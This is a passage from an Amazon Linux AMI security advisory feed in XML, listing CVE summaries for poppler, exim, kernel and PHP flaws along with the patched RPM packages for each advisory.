In Poppler 0.72.0, PDFDoc::setup in PDFDoc.cc allows attackers to cause a denial-of-service (application crash caused by Object.h SIGABRT, because of a wrong return value from PDFDoc::setup) by crafting a PDF file in which an xref data structure is mishandled during extractPDFSubtype processing.
1665273:
CVE-2018-20662 poppler: SIGABRT PDFDoc::setup class in PDFDoc.cc
CVE-2018-20650:
A reachable Object::dictLookup assertion in Poppler 0.72.0 allows attackers to cause a denial of service due to the lack of a check for the dict data type, as demonstrated by use of the FileSpec class (in FileSpec.cc) in pdfdetach.
1665263:
CVE-2018-20650 poppler: reachable Object::dictLookup assertion in FileSpec class in FileSpec.cc
CVE-2018-20481:
XRef::getEntry in XRef.cc in Poppler 0.72.0 mishandles unallocated XRef entries, which allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted PDF document, when XRefEntry::setFlag in XRef.h is called from Parser::makeStream in Parser.cc.
1665266:
CVE-2018-20481 poppler: NULL pointer dereference in the XRef::getEntry in XRef.cc
CVE-2018-19149:
Poppler before 0.70.0 has a NULL pointer dereference in _poppler_attachment_new when called from poppler_annot_file_attachment_get_attachment.
1649457:
CVE-2018-19149 poppler: NULL pointer dereference in _poppler_attachment_new
CVE-2018-19060:
An issue was discovered in Poppler 0.71.0. There is a NULL pointer dereference in goo/GooString.h, will lead to denial of service, as demonstrated by utils/pdfdetach.cc not validating a filename of an embedded file before constructing a save path.
1649450:
CVE-2018-19060 poppler: pdfdetach utility does not validate save paths
CVE-2018-19059:
An issue was discovered in Poppler 0.71.0. There is a out-of-bounds read in EmbFile::save2 in FileSpec.cc, will lead to denial of service, as demonstrated by utils/pdfdetach.cc not validating embedded files before save attempts.
1649440:
CVE-2018-19059 poppler: out-of-bounds read in EmbFile::save2 in FileSpec.cc
CVE-2018-19058:
An issue was discovered in Poppler 0.71.0. There is a reachable abort in Object.h, will lead to denial of service because EmbFile::save2 in FileSpec.cc lacks a stream check before saving an embedded file.
1649435:
CVE-2018-19058 poppler: reachable abort in Object.h
CVE-2018-18897:
An issue was discovered in Poppler 0.71.0. There is a memory leak in GfxColorSpace::setDisplayProfile in GfxState.cc, as demonstrated by pdftocairo.
1646546:
CVE-2018-18897 poppler: memory leak in GfxColorSpace::setDisplayProfile in GfxState.cc
CVE-2018-16646:
In Poppler 0.68.0, the Parser::getObj() function in Parser.cc may cause infinite recursion via a crafted file. A remote attacker can leverage this for a DoS attack.
1626618:
CVE-2018-16646 poppler: infinite recursion in Parser::getObj function in Parser.cc
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16646" title="" id="CVE-2018-16646" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18897" title="" id="CVE-2018-18897" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19058" title="" id="CVE-2018-19058" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19059" title="" id="CVE-2018-19059" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19060" title="" id="CVE-2018-19060" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19149" title="" id="CVE-2018-19149" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20481" title="" id="CVE-2018-20481" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20650" title="" id="CVE-2018-20650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20662" title="" id="CVE-2018-20662" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7310" title="" id="CVE-2019-7310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9200" title="" id="CVE-2019-9200" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9631" title="" id="CVE-2019-9631" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="poppler-cpp" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-cpp-devel-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-debuginfo-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-utils-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-devel-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-devel-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="38.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/poppler-glib-0.26.5-38.19.amzn1.x86_64.rpm</filename></package><package name="poppler-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-devel-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-glib-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-devel-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-cpp-devel" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-devel-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-utils" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-utils-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-glib" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-glib-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-debuginfo" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-debuginfo-0.26.5-38.19.amzn1.i686.rpm</filename></package><package name="poppler-cpp" version="0.26.5" release="38.19.amzn1" epoch="0" arch="i686"><filename>Packages/poppler-cpp-0.26.5-38.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1277</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1277: critical priority package update for exim</title><issued date="2019-09-08 22:54:00" /><updated date="2019-09-09 20:58:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15846:
Exim before 4.92.2 allows remote attackers to execute arbitrary code as root via a trailing backslash.
1748397:
CVE-2019-15846 exim: out-of-bounds access in string_interpret_escape() leading to buffer overflow in the SMTP delivery process
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15846" title="" id="CVE-2019-15846" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-pgsql" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.24.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.24.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.24.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.24.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.24.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.24.amzn1.i686.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1278</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1278: low priority package update for kernel</title><issued date="2019-09-13 22:43:00" /><updated date="2019-09-18 21:24:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-9516:
A flaw was found in the Linux kernel in the hid_debug_events_read() function in the drivers/hid/hid-debug.c file. A lack of the certain checks may result in receiving userspace buffer overflow and an out-of-bounds write or to the infinite loop.
A flaw was found in the Linux kernel in the hid_debug_events_read() function in the drivers/hid/hid-debug.c file. A lack of the certain checks may allow a privileged user (&quot;root&quot;) to achieve an out-of-bounds write and thus receiving user space buffer corruption.
1631036:
CVE-2018-9516 kernel: HID: debug: Buffer overflow in hid_debug_events_read() in drivers/hid/hid-debug.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9516" title="" id="CVE-2018-9516" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.55" release="62.37.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.55-62.37.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.55-62.37.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.55" release="62.37.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.55-62.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1279</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1279: low priority package update for kernel</title><issued date="2019-09-13 22:43:00" /><updated date="2019-09-18 21:25:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7755:
An issue was discovered in the fd_locked_ioctl function in drivers/block/floppy.c in the Linux kernel. The floppy driver will copy a kernel pointer to user memory in response to the FDGETPRM ioctl. An attacker can send the FDGETPRM ioctl and use the obtained kernel pointer to discover the location of kernel code and data and bypass kernel security protections such as KASLR.
1553216:
CVE-2018-7755 kernel: Information exposure in fd_locked_ioctl function in drivers/block/floppy.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7755" title="" id="CVE-2018-7755" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.77-69.57.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.77-69.57.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.77" release="69.57.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.77-69.57.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1280</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1280: medium priority package update for kernel</title><issued date="2019-09-13 22:45:00" /><updated date="2019-09-18 21:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-9363:
A buffer overflow due to a singed-unsigned comparsion was found in hidp_process_report() in the net/bluetooth/hidp/core.c in the Linux kernel. The buffer length is an unsigned int but gets cast to a signed int which in certain conditions can lead to a system panic and a denial-of-service.
1623067:
CVE-2018-9363 kernel: Buffer overflow in hidp_process_report
CVE-2018-15594:
It was found that paravirt_patch_call/jump() functions in the arch/x86/kernel/paravirt.c in the Linux kernel mishandles certain indirect calls, which makes it easier for attackers to conduct Spectre-v2 attacks against paravirtualized guests.
1620555:
CVE-2018-15594 kernel: Mishandling of indirect calls weakens Spectre mitigation for paravirtual guests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15594" title="" id="CVE-2018-15594" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9363" title="" id="CVE-2018-9363" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.67" release="66.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.67-66.56.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.67-66.56.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.67" release="66.56.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.67-66.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1281</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1281: medium priority package update for kernel</title><issued date="2019-09-13 22:48:00" /><updated date="2019-09-18 21:28:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15902:
A backporting error was discovered in the Linux stable/longterm kernel 4.4.x through 4.4.190, 4.9.x through 4.9.190, 4.14.x through 4.14.141, 4.19.x through 4.19.69, and 5.2.x through 5.2.11. Misuse of the upstream &quot;x86/ptrace: Fix possible spectre-v1 in ptrace_get_debugreg()&quot; commit reintroduced the Spectre vulnerability that it aimed to eliminate. This occurred because the backport process depends on cherry picking specific commits, and because two (correctly ordered) code lines were swapped.
1752081:
CVE-2019-15902 kernel: backporting error in ptrace_get_debugreg()
CVE-2019-15538:
An issue was discovered in xfs_setattr_nonsize in fs/xfs/xfs_iops.c in the Linux kernel through 5.2.9. XFS partially wedges when a chgrp fails on account of being out of disk quota. xfs_setattr_nonsize is failing to unlock the ILOCK after the xfs_qm_vop_chown_reserve call fails. This is primarily a local DoS attack vector, but it might result as well in remote DoS if the XFS filesystem is exported for instance via NFS.
1746777:
CVE-2019-15538 kernel: denial of service in in xfs_setattr_nonsize in fs/xfs/xfs_iops.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15538" title="" id="CVE-2019-15538" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15902" title="" id="CVE-2019-15902" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.143" release="91.122.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.143-91.122.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.143-91.122.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.143" release="91.122.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.143-91.122.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1282</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1282: medium priority package update for php71 php72 php73</title><issued date="2019-09-13 22:49:00" /><updated date="2019-09-18 21:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9640:
An issue was discovered in the EXIF component in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. There is an Invalid Read in exif_process_SOFn.
1688939:
CVE-2019-9640 php: Invalid read in exif_process_SOFn()
CVE-2019-9637:
An issue was discovered in PHP before 7.1.27, 7.2.x before 7.2.16, and 7.3.x before 7.3.3. Due to the way rename() across filesystems is implemented, it is possible that file being renamed is briefly available with wrong permissions while the rename is ongoing, thus enabling unauthorized users to access the data.
1688897:
CVE-2019-9637 php: File rename across filesystems may allow unwanted access during processing
